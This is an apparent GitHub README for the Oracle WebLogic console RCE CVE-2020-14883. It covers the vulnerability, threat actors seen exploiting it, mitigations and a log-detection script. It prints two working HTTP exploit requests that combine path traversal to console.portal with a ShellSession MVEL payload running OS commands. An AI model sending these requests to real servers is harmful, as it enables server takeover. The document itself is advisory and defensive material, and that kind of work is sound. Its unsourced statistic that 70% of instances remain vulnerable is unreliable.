Associated Vulnerability
Title: Oracle WebLogic Server Security Vulnerability (CVE-2020-14883)
Description: Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Console). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.1 Base Score 7.2 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H).
Description
CVE-2020-14883
Readme
# 🌐 **CVE-2020-14883** — *Oracle WebLogic Server RCE*
> **Published:** October 20, 2020
> **CVSS v3.1:** `7.2` **(High)**
> **Exploitability:** Easy (with auth) — *Critical when chained*
---
## 🎯 **Vulnerability Overview**
| Attribute | Details |
|--------|---------|
| **Type** | Remote Code Execution (RCE) |
| **Component** | WebLogic Server Console |
| **Attack Vector** | Network (HTTP) |
| **Authentication** | Required *(High Privilege)* |
| **User Interaction** | None |
| **Exploit Code** | Publicly Available |
> **Chained Exploit**:
> `CVE-2020-14882` (Auth Bypass) + `CVE-2020-14883` = **Unauthenticated RCE**
<img width="1920" height="955" alt="CVE-2020-14883" src="https://github.com/user-attachments/assets/a167aeb7-164f-4d15-80cf-a3499b61059d" />
---
## 🔥 **Exploitation Flow**
```http
POST /console/css/%2e%2e%2fconsole.portal HTTP/1.1
Content-Type: application/x-www-form-urlencoded

com.tangosol.coherence.mvel2.sh.ShellSession=java.lang.Runtime.getRuntime().exec("touch /tmp/pwned.txt")
```
Proof of Concept (PoC) 1: using `tangosol.coherence.mvel2.sh.ShellSession()` for Windows-based targets
```http
POST /console/css/%252e%252e%252fconsole.portal HTTP/1.1
Host: vulnerablehost:7001
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 117

_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('calc.exe');");
```
> **Result**: Arbitrary command execution on the server.
---
## 🛑 **In the Wild**
| Threat Actor | Payload |
|--------------|--------|
| **8220 Gang** | Coinminers, Infostealers |
| **Cryptojackers** | XMRig, rhajk, nasqa |
| **APT Groups** | Persistence & Lateral Movement |
---
## 🛡️ **Mitigation Checklist**
| Action | Status |
|-------|--------|
| Apply **Oracle October 2020 CPU** | ✅ Critical |
| Restrict `/console` to trusted IPs | ✅ |
| Disable Console if not needed | ✅ |
| Monitor for `/console.portal` anomalies | ✅ |
| Use IPS/IDS signatures | ✅ |
> **Patch Download**: [My Oracle Support](https://support.oracle.com) (Login Required)
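One way to implement the "Monitor for `/console.portal` anomalies" item is sketched below. It is an added example, not code from the original README or from Oracle. It assumes combined-format access logs and, optionally, request bodies captured by a proxy or WAF; the function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Request field of a combined-format access log: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
GADGET = "com.tangosol.coherence.mvel2.sh.shellsession"  # class named on this page

def fully_decode(value, max_rounds=5):
    """Percent-decode until stable so %252e%252e%252f and %2e%2e%2f both become ../"""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(log_line, body=""):
    """Return the reasons a request looks like the console.portal chain ([] if none)."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return []
    target = fully_decode(match.group("target")).lower()
    path = target.split("?", 1)[0]
    reasons = []
    # A legitimate console URL does not need ../ to reach console.portal.
    if "console.portal" in path and "../" in path:
        reasons.append("traversal-to-console.portal")
    # The handle parameter naming ShellSession may sit in the query or the body.
    if GADGET in target or GADGET in fully_decode(body).lower():
        reasons.append("mvel-shellsession-handle")
    return reasons

# Constructed sample events: (access-log line, request body if the proxy/WAF captured it)
SAMPLES = [
    ('203.0.113.7 - - [01/Nov/2020:10:01:02 +0000] "POST /console/css/%252e%252e%252fconsole.portal HTTP/1.1" 200 1024',
     '_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("PLACEHOLDER")'),
    ('203.0.113.7 - - [01/Nov/2020:10:01:09 +0000] "POST /console/css/%2e%2e%2fconsole.portal HTTP/1.1" 200 1024', ""),
    ('198.51.100.20 - - [01/Nov/2020:10:02:00 +0000] "GET /console/console.portal?_nfpb=true HTTP/1.1" 200 8000', ""),
    ('198.51.100.20 - - [01/Nov/2020:10:02:01 +0000] "GET /console/css/general.css HTTP/1.1" 200 300', ""),
]

def scan(samples=SAMPLES):
    """Return (index, reasons) for every flagged sample."""
    return [(i, r) for i, (line, body) in enumerate(samples) if (r := classify(line, body))]

if __name__ == "__main__":
    for index, reasons in scan():
        print(index, ", ".join(reasons))
```

Decoding until the value stops changing matters here because the two requests shown on this page use different encoding depths for the same traversal.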
---
## 🎨 **Visual Summary**
```mermaid
pie title Exploitation Risk
"Patched" : 30
"Unpatched & Exposed" : 70
```
> **70% of scanned WebLogic instances remain vulnerable in 2025.**
---
**Final Note**:
> This is a **high-value target** for attackers.
> **Patch now. Monitor always.**
---
```mermaid
%%{init: {'theme': 'base', 'themeVariables': { 'fontSize': '13px', 'fontFamily': 'Fira Code, monospace', 'primaryColor': '#ff4d4f', 'primaryTextColor': '#fff', 'primaryBorderColor': '#ff7875', 'lineColor': '#ffccc7', 'secondaryColor': '#ffd591', 'tertiaryColor': '#91d9ff', 'background': '#fafafa' }}}%%
erDiagram
CVE_2020_14883 }|..|{ CVE_2020_14882 : "enables unauthenticated access"
CVE_2020_14883 }|..|{ WEBLOGIC_CONSOLE : "targets"
WEBLOGIC_CONSOLE }|..|{ MVEL_PAYLOAD : "executes via"
MVEL_PAYLOAD }|..|{ SHELL_SESSION : "uses class"
SHELL_SESSION }|..|{ JAVA_RUNTIME : "invokes"
JAVA_RUNTIME }|..|{ OS_COMMAND : "executes"
CVE_2020_14883 {
string id "CVE-2020-14883"
string type "Remote Code Execution"
string cvss "7.2"
string severity "HIGH"
string published "2020-10-20"
string vector "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
}
CVE_2020_14882 {
string id "CVE-2020-14882"
string type "Authentication Bypass"
string cvss "9.8"
string severity "CRITICAL"
}
WEBLOGIC_CONSOLE {
string component "Console"
string endpoint "/console/css/%2e%2e%2fconsole.portal"
string method "POST"
string parameter "com.tangosol.coherence.mvel2.sh.ShellSession"
}
MVEL_PAYLOAD {
string language "MVEL2"
string example "java.lang.Runtime.getRuntime().exec('id')"
string injection_point "ShellSession parameter"
}
SHELL_SESSION {
string class "com.tangosol.coherence.mvel2.sh.ShellSession"
string gadget "Coherence Deserialization"
}
JAVA_RUNTIME {
string method "getRuntime().exec()"
string privilege_level "WebLogic process user"
}
OS_COMMAND {
string scope "Arbitrary OS commands"
string impact "Full system compromise"
}
%% Styling
classDef cve fill:#ff4d4f,stroke:#ff7875,color:#fff
classDef component fill:#ffd591,stroke:#ffc069,color:#000
classDef exploit fill:#91d9ff,stroke:#40a9ff,color:#000
classDef system fill:#d3f261,stroke:#a0d911,color:#000
class CVE_2020_14883,CVE_2020_14882 cve
class WEBLOGIC_CONSOLE,MVEL_PAYLOAD component
class SHELL_SESSION,JAVA_RUNTIME exploit
class OS_COMMAND system
```
---